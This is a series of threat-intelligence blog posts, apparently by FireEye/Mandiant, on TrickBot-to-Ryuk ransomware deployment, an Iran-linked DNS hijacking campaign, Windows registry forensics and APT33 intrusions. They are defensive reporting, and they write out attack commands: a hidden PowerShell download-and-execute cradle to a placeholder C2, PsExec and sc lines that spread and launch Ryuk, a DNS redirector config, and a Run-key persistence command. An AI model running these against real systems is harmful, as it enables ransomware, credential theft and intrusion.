After a foothold was established by the actors controlling TrickBot, a period of inactivity sometimes followed. Dwell time between TrickBot installation and Ryuk distribution varied across intrusions, but in at least one case may have been as long as a full year. Despite this long dwell time, the earliest reports of Ryuk malware only date back to August 2018. It is likely that actors controlling TrickBot instances used to maintain access to victim environments prior to the known availability of Ryuk were monetizing this access in different ways. Further, due to the suspected human-driven component of these intrusion operations, we would expect to commonly see a delay between initial infection and Ryuk deployment or other post-exploitation activity, particularly in cases where the same initial infection vector was used to compromise multiple organizations simultaneously.

Once activity restarted, the actors moved to interactive intrusion by deploying Empire and/or leveraging RDP connections tunneled through reverse-shells instead of relying on the built-in capabilities of TrickBot to interact with the victim network. In multiple intrusions TrickBot's reverse-shell module (NewBCtestDll) was used to execute obfuscated PowerShell scripts which ultimately downloaded and launched an Empire backdoor.
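
The obfuscated scripts observed in these intrusions are not reproduced here, but deobfuscated PowerShell download cradles of this type generally reduce to something similar to the following sketch (the URL is a placeholder, not actor infrastructure):

powershell.exe -NoProfile -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('hxxps://<c2_server>/launcher.ps1')"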

Variations in Ryuk Deployment Across Engagements

Post exploitation activity associated with each Ryuk incident has varied in historical and ongoing Mandiant incident response engagements. Given that collected evidence suggests Ryuk deployment is managed via human-interactive post-exploitation, variation and evolution in methodology, tools, and approach over time and across intrusions is expected.

The following high-level steps appear common across most incidents into which we have insight:

  • Actors produce a list of target systems and save it to one or multiple .txt files.
  • Actors move a copy of PsExec, an instance of Ryuk, and one or more batch scripts to one or more domain controllers or other high privilege systems within the victim environment.
  • Actors run batch scripts to copy a Ryuk sample to each host contained in .txt files and ultimately execute them.

Some of the notable ways Ryuk deployment has varied include:

  • In one case, there was evidence suggesting that actors enumerated hosts on the victim network to identify targets for encryption with Ryuk, but in multiple other cases these lists were manually copied to the server later used for Ryuk distribution, with no clear evidence of how they were produced.
  • There have been multiple cases where TrickBot was deployed broadly across victim environments rather than being used to maintain a foothold on a small number of hosts.
  • We have not identified evidence that Empire was used by the attackers in all cases, and in some instances Empire was used to access the victim environment only after Ryuk encryption had started.
  • In one case, the attackers used a variant of Ryuk with slightly different capabilities accompanied by a standalone .bat script containing most of the same taskkill, net, and sc commands normally used by Ryuk to terminate processes and stop services related to anti-virus, backup, and database software.

Example of Ryuk Deployment – Q3 2018

  • Using previously stolen credentials the attacker logged into a domain controller and copied tools into the %TEMP% directory. Copied tools included AdFind.exe (Active Directory enumeration utility), a batch script (Figure 2), and a copy of the 7-Zip archive utility.
  • Downloaded utilities were copied to C:\Windows\SysWOW64\.
  • The attacker performed host and network reconnaissance using built-in Windows commands.
  • AdFind.exe was executed using the previously noted batch script, which was crafted to pass the utility a series of commands that were used to collect information about Active Directory users, systems, OUs, subnets, groups, and trust objects. The output from each command was saved to an individual text file alongside the AdFind.exe utility (Figure 2).
  • This process was performed twice on the same domain controller, 10 hours apart. Between executions of AdFind the attacker tested access to multiple domain controllers in the victim environment, including the one later used to deploy Ryuk.
  • The attacker logged into a domain controller and copied instances of PSExec.exe, a batch script used to kill processes and stop services, and an instance of Ryuk onto the system.
  • Using PsExec the attacker copied the process/service killing batch script to the %TEMP% folder on hundreds of computers across the victim environment, from which it was then executed.
  • The attacker then used PsExec to copy the Ryuk binary to the %SystemRoot% directories of these same computers. A new service configured to launch the Ryuk binary was then created and started (an illustrative command sequence is shown after Figure 2).
  • Ryuk execution proceeded as normal, encrypting files on impacted systems.

adfind.exe -f (objectcategory=person) > <user_list>.txt
adfind.exe -f objectcategory=computer > <computer_list>.txt
adfind.exe -f (objectcategory=organizationalUnit) > <ou_list>.txt
adfind.exe -subnets -f (objectCategory=subnet) > <subnet_list>.txt
adfind.exe -f "(objectcategory=group)" > <group_list>.txt
adfind.exe -gcb -sc trustdmp > <trustdmp>.txt

Figure 2: Batch script that uses adfind.exe tool to enumerate Active Directory objects
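
For the service-based execution step described in the list above, remote service creation is typically performed with the built-in sc utility. The following is a hypothetical sketch with host, service, and binary names as placeholders; the attacker's exact commands were not recovered:

sc \\<target_host> create <service_name> binpath= "C:\Windows\<ryuk_exe>" start= demand
sc \\<target_host> start <service_name>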

Example of Ryuk Deployment – Q4 2018

  • An instance of the EMPIRE backdoor was launched on a system that had been infected by TrickBot. The attacker used EMPIRE’s built-in capabilities to perform network reconnaissance.
  • Attackers connected to a domain controller in the victim network via RDP and copied several files into the host’s C$ share. The copied files included an instance of PsExec, two batch scripts, an instance of the Ryuk malware, and multiple .txt files containing lists of hosts within the victim environment. Many of the targeted hosts were critical systems across the victim environment including domain controllers and other hosts providing key management and authentication services.
  • The attackers then executed the first of these two batch scripts. The executed script used PsExec and hard-coded credentials previously stolen by the actors to copy the Ryuk binary to each host passed as input from the noted .txt files (Figure 3).
  • Attackers then executed the second batch script which iterated through the same host lists and used PsExec to execute the Ryuk binaries copied by the first batch script (Figure 4).

start PsExec.exe @C:\<shared_folder>$\<list>.txt -u <domain>\<username> -p <password> cmd /c COPY "\\<shared_folder>\<ryuk_exe>" "C:\windows\temp\"

Figure 3: Line from the batch file used to copy Ryuk executable to each system

start PsExec.exe -d @C:\<shared_folder>$\<list>.txt -u <domain>\<username> -p <password> cmd /c "C:\windows\temp\<ryuk_exe>"

Figure 4: Line from the batch file used to execute Ryuk on each system

Consistency in TrickBot Group Tags

Each individual TrickBot sample beacons to its Command & Control (C2) infrastructure with a statically defined “gtag” that is believed to act as an identifier for distinct TrickBot customers. There has been significant uniformity in the gtags associated with TrickBot samples collected from the networks of victim organizations.

  • The instance of TrickBot identified as the likely initial infection vector for one intrusion was configured to use the gtag ‘ser0918us’.
    • At the time of distribution, the C2 servers responding to TrickBot samples using the gtag ‘ser0918us’ were sending commands to request that the malware scan victim networks, and then propagate across hosts via the TrickBot worming module.
    • It is possible that in some or all cases instances of TrickBot propagated via the malware’s worming module are configured to use different gtag values, specific to the same TrickBot client, designed to simplify management of implants post-exploitation.
  • A significant proportion of TrickBot samples obtained from the victim environments, including in the case where the infection vector was identified as a sample using gtag ‘ser0918us’, had gtags in the below formats. This may suggest that these gtags are used to manage post-exploitation instances of TrickBot for campaigns distributed via gtag ‘ser0918us’ and other related gtags.
    • libxxx (ex: lib373, lib369, etc)
    • totxxx (ex: tot373, tot369, etc)
    • jimxxx (ex: jim373, jim369, etc)
  • The numbers appended to the end of each gtag appear to increment over time, and in some cases multiple samples sharing the same compile time but using different gtags were observed in the same victim environment, though in each of these cases the numbers appended to the end of the gtag matched (e.g. two distinct samples sharing the compile time 2018-12-07 11:28:23 were configured to use the gtags ‘jim371’ and ‘tot371’).
  • The C2 infrastructure hard-coded into these samples overlaps significantly across samples sharing similar gtag values. However, there is also C2 infrastructure overlap between these samples and ones with dissimilar gtag values. These patterns may suggest the use of proxy infrastructure shared across multiple clients of the TrickBot administrator group.

Implications

Throughout 2018, FireEye observed an increasing number of cases where ransomware was deployed after the attackers gained access to the victim organization through other methods, allowing them to traverse the network to identify critical systems and inflict maximum damage. SamSam operations, which date back to late 2015, were arguably the first to popularize this methodology, and TEMP.MixMaster is an example of its growing popularity with threat actors. FireEye Intelligence expects that these operations will continue to gain traction throughout 2019 due to the success these intrusion operators have had in extorting large sums from victim organizations.

It is also worth highlighting TEMP.MixMaster’s reliance on TrickBot malware, which is more widely distributed, to gain access to victim organizations. Following indiscriminate campaigns, threat actors can profile victims to identify systems and users of interest and subsequently determine potential monetization strategies to maximize their revenue. Various malware families have incorporated capabilities that can aid in the discovery of high-value targets, underscoring the necessity for organizations to prioritize proper remediation of all threats, not only those that initially appear to be targeted.

Acknowledgements

The authors would like to thank Brice Daniels, Edward Li, Eric Montellese, Sandor Nemes, Eric Scales, Brandan Schondorfer, Martin Tremblay, Isif Ibrahima, Phillip Kealy and Steve Rasch for their contributions to this blog post.

Global DNS Hijacking Campaign: DNS Record Manipulation at Scale

Introduction

FireEye’s Mandiant Incident Response and Intelligence teams have identified a wave of DNS hijacking that has affected dozens of domains belonging to government, telecommunications and internet infrastructure entities across the Middle East and North Africa, Europe and North America. While we do not currently link this activity to any tracked group, initial research suggests the actor or actors responsible have a nexus to Iran. This campaign has targeted victims across the globe on an almost unprecedented scale, with a high degree of success. We have been tracking this activity for several months, mapping and understanding the innovative tactics, techniques and procedures (TTPs) deployed by the attacker. We have also worked closely with victims, security organizations, and law enforcement agencies where possible to reduce the impact of the attacks and/or prevent further compromises.

While this campaign employs some traditional tactics, it is differentiated from other Iranian activity we have seen by leveraging DNS hijacking at scale. The attacker uses this technique for their initial foothold, which can then be exploited in a variety of ways. In this blog post, we detail the three different ways we have seen DNS records manipulated to enable victim compromises. Technique 1, involving the creation of a Let's Encrypt certificate and changing the A record, was previously documented by Cisco’s TALOS team. The activity described in their blog post is a subset of the activity we have observed.

Initial Research Suggests Iranian Sponsorship

Attribution analysis for this activity is ongoing. While the DNS record manipulations described in this post are noteworthy and sophisticated, they may not be exclusive to a single threat actor as the activity spans disparate timeframes, infrastructure, and service providers.

  • Multiple clusters of this activity have been active from January 2017 to January 2019.
  • There are multiple, nonoverlapping clusters of actor-controlled domains and IPs used in this activity.
  • A wide range of providers were chosen for encryption certificates and VPS hosts.

Preliminary technical evidence allows us to assess with moderate confidence that this activity is conducted by persons based in Iran and that the activity aligns with Iranian government interests.

  • FireEye Intelligence identified access from Iranian IPs to machines used to intercept, record and forward network traffic. While geolocation of an IP address is a weak indicator, these IP addresses were previously observed during the response to an intrusion attributed to Iranian cyber espionage actors.
  • The entities targeted by this group include Middle Eastern governments whose confidential information would be of interest to the Iranian government and have relatively little financial value.

Details

The following examples use victim[.]com to stand in for the victim domain, and private IP addresses to stand in for the actor-controlled IP addresses.

Technique 1 – DNS A Records

The first method exploited by the attacker is altering DNS A Records, as seen in Figure 1.


Figure 1: DNS A Record

  1. The attacker logs into PXY1, a Proxy box used to conduct non-attributed browsing and as a jumpbox to other infrastructure.
  2. The attacker logs into the DNS provider’s administration panel, utilising previously compromised credentials.
  3. The A record (e.g. mail[.]victim[.]com) is currently pointing to 192.168.100.100.
  4. The attacker changes the A record and points it to 10.20.30.40 (OP1).
  5. The attacker logs in from PXY1 to OP1.
    • A proxy is implemented to listen on all open ports, mirroring mail[.]victim[.]com.
    • A load balancer points to 192.168.100.100 [mail[.]victim[.]com] to pass through user traffic.
  6. certbot is used to create a Let’s Encrypt certificate for mail[.]victim[.]com (an illustrative command is shown after this list).
    • We have observed multiple Domain Control Validation providers being utilised as part of this campaign.
  7. A user now visits mail[.]victim[.]com and is directed to OP1. The Let’s Encrypt certificate allows the browsers to establish a connection without any certificate errors as Let's Encrypt Authority X3 is trusted. The connection is forwarded to the load balancer which establishes the connection with the real mail[.]victim[.]com. The user is not aware of any changes and may only notice a slight delay.
  8. The username, password and domain credentials are harvested and stored.
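
As an illustration of step 6, a Let's Encrypt certificate for the hijacked hostname can be requested with a standard certbot invocation such as the one below (mail.victim.com is the placeholder hostname used throughout this post, shown undefanged for readability; the exact issuance method used by the actor was not confirmed):

certbot certonly --standalone -d mail.victim.com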

Technique 2 – DNS NS Records

The second method exploited by the attacker involved altering DNS NS Records, as seen in Figure 2.


Figure 2: DNS NS Record

  1. The attacker again logs into PXY1.
  2. This time, however, the attacker exploits a previously compromised registrar or ccTLD.
  3. The nameserver record ns1[.]victim[.]com is currently set to 192.168.100.200. The attacker changes the NS record and points it to ns1[.]baddomain[.]com [10.1.2.3]. That nameserver will respond with the IP 10.20.30.40 (OP1) when mail[.]victim[.]com is requested, but with the original IP 192.168.100.100 if it is www[.]victim[.]com.
  4. The attacker logs in from PXY1 to OP1.
    • A proxy is implemented to listen on all open ports, mirroring mail[.]victim[.]com.
    • A load balancer points to 192.168.100.100 [mail[.]victim[.]com] to pass through user traffic.
  5. certbot is used to create a Let’s Encrypt certificate for mail[.]victim[.]com.
    • We have observed multiple Domain Control Validation providers being utilised during this campaign.
  6. A user visits mail[.]victim[.]com and is directed to OP1. The Let’s Encrypt certificate allows browsers to establish a connection without any certificate errors as Let's Encrypt Authority X3 is trusted. The connection is forwarded to the load balancer which establishes the connection with the real mail[.]victim[.]com. The user is not aware of any changes and may only notice a slight delay.
  7. The username, password and domain credentials are harvested and stored.

Technique 3 – DNS Redirector

The attacker has also been observed using a third technique in conjunction with either Figure 1 or Figure 2 above. This involves a DNS Redirector, as seen in Figure 3.


Figure 3: DNS Operational box

The DNS Redirector is an attacker operations box which responds to DNS requests.

  1. A DNS request for mail[.]victim[.]com is sent to OP2 (based on previously altered A Record or NS Record).
  2. If the domain is part of victim[.]com zone, OP2 responds with an attacker-controlled IP address, and the user is re-directed to the attacker-controlled infrastructure.
  3. If the domain is not part of the victim[.]com zone (e.g. google[.]com), OP2 makes a DNS request to a legitimate DNS server to resolve the IP address, and the legitimate IP address is returned to the user (a minimal configuration sketch illustrating this behavior follows the list).
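
The actual redirector software was not recovered, but the behavior described above can be approximated with a few lines of off-the-shelf resolver configuration. As a minimal sketch, a dnsmasq configuration of roughly this shape answers queries in the victim zone with the attacker-controlled IP and forwards everything else upstream:

# Answer any query in the victim.com zone with the attacker-controlled IP (OP1)
address=/victim.com/10.20.30.40
# Forward all other queries to a legitimate resolver
server=8.8.8.8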

Targets

A large number of organizations have been affected by this pattern of DNS record manipulation and fraudulent SSL certificates. They include telecommunications providers and ISPs, internet infrastructure providers, government entities, and sensitive commercial entities.

Root Cause Still Under Investigation

It is difficult to identify a single intrusion vector for each record change, and it is possible that the actor, or actors, are using multiple techniques to gain an initial foothold into each of the targets described above. FireEye intelligence customers have received previous reports describing sophisticated phishing attacks used by one actor that also conducts DNS record manipulation. Additionally, while the precise mechanism by which the DNS records were changed is unknown, we believe that at least some records were changed by compromising a victim’s domain registrar account.

Prevention Tactics

This type of attack is difficult to defend against because valuable information can be stolen even if an attacker never gains direct access to your organization’s network. Some steps to harden your organization include:

  1. Implement multi-factor authentication on your domain’s administration portal.
  2. Validate A and NS record changes.
  3. Search for SSL certificates related to your domain (for example, in Certificate Transparency logs; an example query is shown after this list) and revoke any malicious certificates.
  4. Validate the source IPs in OWA/Exchange logs.
  5. Conduct an internal investigation to assess if attackers gained access to your environment.
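
For item 3, Certificate Transparency logs are a practical starting point. As one example, crt.sh can be queried for all certificates issued for a domain (victim.com is the placeholder domain; substitute your own):

curl -s "https://crt.sh/?q=%25.victim.com&output=json"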

Conclusion

This DNS hijacking, and the scale at which it has been exploited, showcases the continuing evolution in tactics from Iran-based actors. This is an overview of one set of TTPs that we recently observed affecting multiple entities. We are highlighting it now so that potential targets can take appropriate defensive action.

Digging Up the Past: Windows Registry Forensics Revisited

Introduction

FireEye consultants frequently utilize Windows registry data when performing forensic analysis of computer networks as part of incident response and compromise assessment missions. This can be useful to discover malicious activity and to determine what data may have been stolen from a network. Many different types of data are present in the registry that can provide evidence of program execution, application settings, malware persistence, and other valuable artifacts.

Performing forensic analysis of past attacks can be particularly challenging. Advanced persistent threat actors will frequently utilize anti-forensic techniques to hide their tracks and make the jobs of incident responders more difficult. To provide our consultants with the best possible tools we revisited our existing registry forensic techniques and identified new ways to recover historical and deleted registry data. Our analysis focused on the following known sources of historical registry data:

  • Registry transaction logs (.LOG)
  • Transactional registry transaction logs (.TxR)
  • Deleted entries in registry hives
  • Backup system hives (REGBACK)
  • Hives backed up with System Restore

Windows Registry Format

The Windows registry is stored in a collection of hive files. Hives are binary files containing a simple filesystem with a set of cells used to store keys, values, data, and related metadata. Registry hives are read and written in 4KB pages (also called bins).

For a detailed description of the Windows registry hive format, see this research paper and this GitHub page.

Registry Transaction Logs (.LOG)

To maximize registry reliability, Windows can use transaction logs when performing writes to registry files. The logs act as journals that store data being written to the registry before it is written to hive files. Transaction logs are used when registry hives cannot directly be written due to locking or corruption.

Transaction logs are written to files in the same directory as their corresponding registry hives. They use the same filename as the hive with a .LOG extension. Windows may use multiple logs in which case .LOG1 and .LOG2 extensions will be used.

For more details about the transaction log format, see this GitHub page.

Registry transaction logs were first introduced in Windows 2000. In the original transaction log format data is always written at the start of the transaction log. A bitmap is used to indicate what pages are present in the log, and pages follow in order. Because the start of the file is frequently overwritten, it is very difficult to recover old data from these logs. Since different amounts of data will be written to the transaction log on each use, it is possible for old pages to remain in the file across multiple uses. However, the location of each page will have to be inferred by searching for similar pages in the current hive, and the probability of consistent data recovery is very small.

A new registry transaction log format was introduced with Windows 8.1. Although the new logs are used in the same fashion, they have a different format. The new logs work like a ring buffer where the oldest data in the log is overwritten by new data. Each entry in the new log format includes a sequence number as well as registry offset making it easy to determine the order of writes and where the pages were written. Because of the changed log format, data is overwritten much less frequently, and old transactions can often be recovered from these log files.

The amount of data that can be recovered depends on registry activity. A sampling of transaction logs from real world systems showed a range of recoverable data from a few days to a few weeks. Real world recoverability can vary considerably. Registry-heavy operations, such as Windows Update, can significantly reduce the recoverable range.

Although the new log format contains more recoverable information, turning a set of registry pages into useful data is quite tricky. First, it requires keeping track of all pages in the registry and determining what might have changed in a particular write. It also requires determining if that change resulted in something that is not present in later revisions of the hive to assess whether or not it contains unique data.

Our current approach for processing registry transaction files uses the following algorithm:

  1. Sort all writes by sequence number descending so that we process the most recent writes first.
  2. Perform allocated and unallocated cell parsing to find allocated and deleted entries.
  3. Compare entries against the original hive. Any entries that are not present are marked as deleted and logged.

Transaction Log Example

In this example we create a registry value under the Run key that starts malware.exe when the user logs in to the system.


Figure 1: A malicious actor creates a value in the Run key
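
The value shown in Figure 1 is the kind of entry that could be created with a command along the following lines (the value name and path are placeholders for this example):

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\victim\AppData\Roaming\malware.exe" /f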

At a later point in time the malware is removed from the system. The registry value is overwritten before being deleted.


Figure 2: The malicious value is overwritten and deleted

Although the deleted value still exists in the hive, existing forensic tools will not be able to recover the original data because it was overwritten.


Figure 3: The overwritten value is present in the registry hive

However, in this case the data is still present in the transaction log and can be recovered.


Figure 4: The transaction log contains the original value

Transactional Registry Transaction Logs (.TxR)

In addition to the transaction log journal there are also logs used by the transactional registry subsystem. Applications can utilize the transactional registry to perform compound registry operations atomically. This is most commonly used by application installers as it simplifies failed operation rollback.

Transactional registry logs use the Common Log File System (CLFS) format. The logs are stored to files of the form <hive><GUID>.TxR.<number>.regtrans-ms. For user hives these files are stored in the same directory as the hive and are cleared on user logout. However, for system hives logs are stored in %SystemRoot%\System32\config\TxR, and the logs are not automatically cleared. As a result, it is typically possible to recover historical data from system transactional logs.

The format of transactional logs is not well understood or documented. Microsoft has provided a general overview of CLFS logs and API.

With some experimentation we were able to determine the basic record format. We can identify records for registry key creation and deletion as well as registry value writes and deletes. The relevant key path, value name, data type, and data are present within log entries. See the appendix for transaction log record format details.

Although most data present in registry transaction logs is not particularly valuable for intrusion investigations, there are some cases where the data can prove useful. In particular, we found that scheduled task creation and deletion use registry transactions. By parsing registry transaction logs we were able to find evidence of attacker created scheduled tasks on live systems. This data was not available in any other location.

The task scheduler has been observed using transactional registry operations on Windows Vista through Windows 8.1; the task scheduler on Windows 10 does not exhibit this behavior. It is not known why Windows 10 behaves differently.

Transactional Registry Example

In this example we create a scheduled task. The scheduled task periodically runs malware.


Figure 5: Creating a scheduled task to run malware

Information about the scheduled task is stored to the registry.


Figure 6: A registry entry created by the task scheduler

Because the scheduled task was written to the registry using transacted registry operations, a copy of the data is available in the transactional registry transaction log. The data can remain in the log well after the scheduled task has been removed from the system.


Figure 7: The malicious scheduled task in the TxR log

Deleted Entry Recovery

In addition to transaction logs, we also examined methods for the recovery of deleted entries from registry hive files. We started with an in-depth analysis of some common techniques used by forensic tools today in the hopes of identifying a more accurate approach.

Deleted entry recovery requires parsing registry cells in hive files. This is relatively straightforward. FireEye has a number of tools that can read raw registry hive files and parse relevant keys, values, and data from cells. Recovering deleted data is more complex because some information is lost when elements are deleted. A more sophisticated approach is required to deal with the resulting ambiguity.

When parsing cells there is only one common field: the cell size. Some cell types contain magic number identifiers, which can help determine their type. However, other cell types, such as data and value lists, do not have identifiers; their types must be inferred by following references from other cells. Additionally, the size of data within a cell can differ from the cell size. Depending on the cell type it may be necessary to leverage information from referencing cells to determine the data size.

When a registry element is deleted its cells are marked as unallocated. Because the cells are not immediately overwritten, deleted elements can often be recovered from registry hives. However, unallocated cells may be coalesced with adjacent unallocated cells to maximize traversal efficiency. This makes deleted cell recovery more complex because cell sizes may be modified. As a result, original cell boundaries are not well defined and must be determined implicitly by examining cell contents.

Existing Approaches for Recovering Deleted Entries

A review of public literature and source code revealed existing methods for recovery of deleted elements from registry hive files. Variations of the following algorithm were commonly found:

  1. Search through all unallocated cells looking for deleted key cells.
  2. Find referenced deleted values from deleted keys.
  3. Search through all remaining unallocated cells looking for unreferenced deleted value cells.
  4. Find referenced data cells from all deleted values.

We implemented a similar algorithm to experiment with its efficacy. Although this simple algorithm was able to recover many deleted registry elements, it had a number of significant shortcomings. One major issue was the inability to validate any references from deleted cells. Because referenced cells may have already been overwritten or reused multiple times, our program frequently made mistakes in identifying values and data resulting in false positives and invalid output.

We also compared program output to popular registry forensic tools. Although our program produced much of the same output, it was evident that existing registry forensic tools were able to recover more data. In particular, existing tools were able to recover deleted elements from slack space of allocated cells that had not yet been overwritten.

Additionally, we found that orphaned allocated cells are also considered deleted. It is not known how unreferenced allocated cells could exist in a registry hive as all related cells should be unallocated simultaneously on deletion. It is possible that certain types of failures could result in deleted cells not becoming unallocated properly.

Through experimentation we discovered that existing registry tools were able to perform better validation resulting in fewer false positives. However, we also identified many cases where existing tools made incorrect deleted value associations and output invalid data. This likely occurs when cells are reused multiple times resulting in references that could appear valid if not carefully scrutinized.

A New Approach for Recovering Deleted Entries

Given the potential for improving our algorithm, we undertook a major redesign to recover deleted registry elements with maximum accuracy and efficiency. After many rounds of experimentation and refinement we ended up with a new algorithm that can accurately recover deleted registry elements while maximizing performance. This was achieved by discovering and keeping track of all cells in registry hives to perform better validation, by processing cell slack space, and by discovering orphaned keys and values. Testing results closely matched existing registry forensics tools but with better validation and fewer false positives.

The following is a summary of the improved algorithm:

  1. Perform basic parsing for all allocated and unallocated cells. Determine cell type and data size where possible.
  2. Enumerate all allocated cells and do the following:
    • For allocated keys find referenced value lists, class names, and security records. Populate data size of referenced cells. Validate key ancestors to determine if the key has been orphaned.
    • For allocated values find referenced data and populate data size.
  3. Define all allocated cell slack space as unallocated cells.
  4. Enumerate allocated keys and attempt to find deleted values present in the values list. Also attempt to find old deleted value references in the value list slack space.
  5. Enumerate unallocated cells and attempt to find deleted key cells.
  6. Enumerate unallocated keys and attempt to define referenced class names, security records, and values.
  7. Enumerate unallocated cells and attempt to find unreferenced deleted value cells.
  8. Enumerate unallocated values and attempt to find referenced data cells.

Deleted Recovery Example

The following example demonstrates how our deleted entry recovery algorithm can perform more accurate data recovery and avoid false positives. Figure 8 shows an example of a data recovery error by a popular registry forensics tool:


Figure 8: Incorrectly recovered registry data

Note that the ProviderName recovered from this key was jumbled because it referred to a location that had been overwritten. When our deleted registry recovery tool is run over the same hive, it recognizes that the data has been overwritten and does not output garbled text. The data_present field in Figure 9 with a value of 0 indicates that the deleted data could not be recovered from the hive.

Key: CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}\
     ControlSet002\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0019
Value: ProviderName  Type: REG_SZ  (value_offset=0x137FE40) (data_size=20)
     (data_present=0) (data_offset=0x10EAF68) (deleted_type=UNALLOCATED)

Figure 9: Properly validated registry data

Registry Backups

Windows includes a simple mechanism to backup system registry hives periodically. The hives are backed up with a scheduled task called RegIdleBackup, which is scheduled to run every 10 days by default. Backed up hives are stored to %SystemRoot%\System32\config\RegBack. Only the most recent backup is stored in this location. This can be useful for investigating recent activity on a system.
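
On systems where the task is present, its schedule and last run time can be checked with schtasks, and a backup can be triggered on demand (illustrative commands; output and behavior vary by Windows version):

schtasks /Query /TN "\Microsoft\Windows\Registry\RegIdleBackup" /V /FO LIST
schtasks /Run /TN "\Microsoft\Windows\Registry\RegIdleBackup"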

The RegIdleBackup feature was first included with Windows Vista. It is present in all versions of Windows since then, but it does not run by default on Windows 10 systems, and even when it is manually run no backups are created. It is not known why RegIdleBackup was removed from Windows 10.

In addition to RegBack, registry data is backed up with System Restore. By default, System Restore snapshots are created whenever software is installed or uninstalled, including Windows Updates. As a result, System Restore snapshots are usually created on at least a monthly basis if not more frequently. Although some advanced persistent threat groups have been known to manipulate System Restore snapshots, evidence of historical attacker activity can usually be found if a snapshot was taken at a time when the attacker was active. System Restore snapshots contain all registry hives including system and user hives.

Wikipedia has some good information about System Restore.

Processing hives in System Restore snapshots can be challenging as there may be many snapshots present on a system resulting in a large amount of data to be processed, and often there will only be minor changes in hives between snapshots. One strategy to handle the large number of snapshots is to build a structure representing the cells of the registry hive, then repeat the process for each snapshot. Anything not in the previous structure can be considered deleted and logged appropriately.
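
One practical way to get at the hives inside System Restore data is to enumerate the available shadow copies and expose each one through a directory link so the hive files can be copied and parsed like ordinary files. A hedged example, assuming shadow copy 1 exists and noting that the trailing backslash is required:

vssadmin list shadows
mklink /d C:\vss_1 \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
copy C:\vss_1\Windows\System32\config\SOFTWARE C:\evidence\SOFTWARE_snapshot1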

Conclusion

The registry can provide a wealth of data for a forensic investigator. With numerous sources of deleted and historical data, a more complete picture of attacker activity can be assembled during an investigation. As attackers continue to gain sophistication and improve their tradecraft, investigators will have to adapt to discover and defend against them.

Appendix - Transactional Registry Transaction Log (.TxR) Record Format

Registry transaction logs contain records with the following format:

Offset   Field                      Size
0        Magic number (0x280000)    4
...
12       Record size                4
16       Record type (1)            4
20       Registry operation type    2
...
40       Key path size              2
42       Key path size repeated     2

The magic number is always 0x280000.
The record size includes the header.
The record type is always 1.

Operation type 1 is key creation.
Operation type 2 is key deletion.
Operation types 3-8 are value write or delete. It is not known what the different types signify.

The key path size is at offset 40 and repeated at offset 42. This is present for all registry operation types.

For registry key write and delete operations, the key path is at offset 72.

For registry value write and delete operations, the following data is present:

Offset   Field                      Size
56       Value name size            2
58       Value name size repeated   2
...
72       Data type                  4
76       Data size                  4

The data for value records starts at offset 88. It contains the key path followed by the value name optionally followed by data. If data size is nonzero, the record is a value write operation; otherwise it is a value delete operation.

OVERRULED: Containing a Potentially Destructive Adversary

Introduction

FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

